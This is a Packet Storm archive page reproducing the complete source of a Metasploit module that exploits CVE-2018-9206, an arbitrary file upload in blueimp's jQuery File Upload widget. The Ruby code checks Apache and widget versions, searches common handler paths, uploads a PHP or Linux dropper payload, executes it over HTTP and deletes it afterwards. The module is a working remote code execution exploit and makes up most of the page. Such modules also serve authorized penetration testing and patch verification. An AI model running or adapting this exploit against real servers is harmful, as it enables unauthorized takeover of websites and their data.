exploit the possibilities

blueimp jQuery Arbitrary File Upload

blueimp jQuery Arbitrary File Upload
Posted Nov 5, 2018
Authored by Larry W. Cashdollar, wvu, Claudio Viviani | Site metasploit.com

This Metasploit module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions 9.22.0 and below. Due to a default configuration in Apache 2.3.9+, the widget's .htaccess file may be disabled, enabling exploitation of this vulnerability. This vulnerability has been exploited in the wild since at least 2015 and was publicly disclosed to the vendor in 2018. It has been present since the .htaccess change in Apache 2.3.9. This Metasploit module provides a generic exploit against the jQuery widget.

tags | exploit, arbitrary, php, file upload
advisories | CVE-2018-9206
MD5 | dc66674939d313842bacc7cddcbdd16c

blueimp jQuery Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE

def initialize(info = {})
super(update_info(info,
'Name' => "blueimp's jQuery (Arbitrary) File Upload",
'Description' => %q{
This module exploits an arbitrary file upload in the sample PHP upload
handler for blueimp's jQuery File Upload widget in versions <= 9.22.0.

Due to a default configuration in Apache 2.3.9+, the widget's .htaccess
file may be disabled, enabling exploitation of this vulnerability.

This vulnerability has been exploited in the wild since at least 2015
and was publicly disclosed to the vendor in 2018. It has been present
since the .htaccess change in Apache 2.3.9.

This module provides a generic exploit against the jQuery widget.
},
'Author' => [
'Claudio Viviani', # WordPress Work the Flow (Arbitrary) File Upload
'Larry W. Cashdollar', # (Re)discovery, vendor disclosure, and PoC
'wvu' # Metasploit module
],
'References' => [
['CVE', '2018-9206'],
['URL', 'http://www.vapidlabs.com/advisory.php?v=204'],
['URL', 'https://github.com/blueimp/jQuery-File-Upload/pull/3514'],
['URL', 'https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206'],
['URL', 'https://www.homelab.it/index.php/2015/04/04/wordpress-work-the-flow-file-upload-vulnerability/'],
['URL', 'https://github.com/rapid7/metasploit-framework/pull/5130'],
['URL', 'https://httpd.apache.org/docs/current/mod/core.html#allowoverride']
],
'DisclosureDate' => 'Oct 9 2018', # Larry's disclosure to the vendor
'License' => MSF_LICENSE,
'Platform' => ['php', 'linux'],
'Arch' => [ARCH_PHP, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
['PHP Dropper', 'Platform' => 'php', 'Arch' => ARCH_PHP],
['Linux Dropper', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64]]
],
'DefaultTarget' => 0
))

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/jQuery-File-Upload'])
])
end

def version_paths
%w[
/package.json
/bower.json
].map { |u| normalize_uri(target_uri.path, u) }
end

# List from PoC sorted by frequency
def upload_paths
%w[
/server/php/index.php
/server/php/upload.class.php
/server/php/UploadHandler.php
/example/upload.php
/php/index.php
].map { |u| normalize_uri(target_uri.path, u) }
end

def check
a = nil

version_paths.each do |u|
vprint_status("Checking #{u}")

res = send_request_cgi(
'method' => 'GET',
'uri' => u
)

next unless res

unless a
res.headers['Server'] =~ /Apache\/([\d.]+)/ &&
$1 && (a = Gem::Version.new($1))

if a && a >= Gem::Version.new('2.3.9')
vprint_good("Found Apache #{a} (AllowOverride None may be set)")
elsif a
vprint_warning("Found Apache #{a} (AllowOverride All may be set)")
end
end

next unless res.code == 200 && (j = res.get_json_document) &&
j['version'] && (v = Gem::Version.new(j['version']))

if v <= Gem::Version.new('9.22.0')
vprint_good("Found unpatched jQuery File Upload #{v}")
return CheckCode::Appears
else
vprint_error("Found patched jQuery File Upload #{v}")
return CheckCode::Safe
end
end

CheckCode::Unknown
end

def find_upload
upload_paths.each do |u|
vprint_status("Checking #{u}")

res = send_request_cgi(
'method' => 'GET',
'uri' => u
)

if res && res.code == 200
vprint_good("Found #{u}")
return u
end
end

nil
end

def exploit
unless check == CheckCode::Appears && (u = find_upload)
fail_with(Failure::NotFound, 'Could not find target')
end

f = "#{rand_text_alphanumeric(8..42)}.php"
p = normalize_uri(File.dirname(u), 'files', f)

print_status('Uploading payload')
res = upload_payload(u, f)

unless res && res.code == 200 && res.body.include?(f)
fail_with(Failure::NotVulnerable, 'Could not upload payload')
end

print_good("Payload uploaded: #{full_uri(p)}")

print_status('Executing payload')
exec_payload(p)

print_status('Deleting payload')
delete_payload(u, f)
end

def upload_payload(u, f)
p = get_write_exec_payload(unlink_self: true)

m = Rex::MIME::Message.new
m.add_part(p, nil, nil, %(form-data; name="files[]"; filename="#{f}"))

send_request_cgi(
'method' => 'POST',
'uri' => u,
'ctype' => "multipart/form-data; boundary=#{m.bound}",
'data' => m.to_s
)
end

def exec_payload(p)
send_request_cgi({
'method' => 'GET',
'uri' => p
}, 1)
end

def delete_payload(u, f)
send_request_cgi(
'method' => 'DELETE',
'uri' => u,
'vars_get' => {'file' => f}
)
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    3 Files
  • 21
    Jan 21st
    17 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close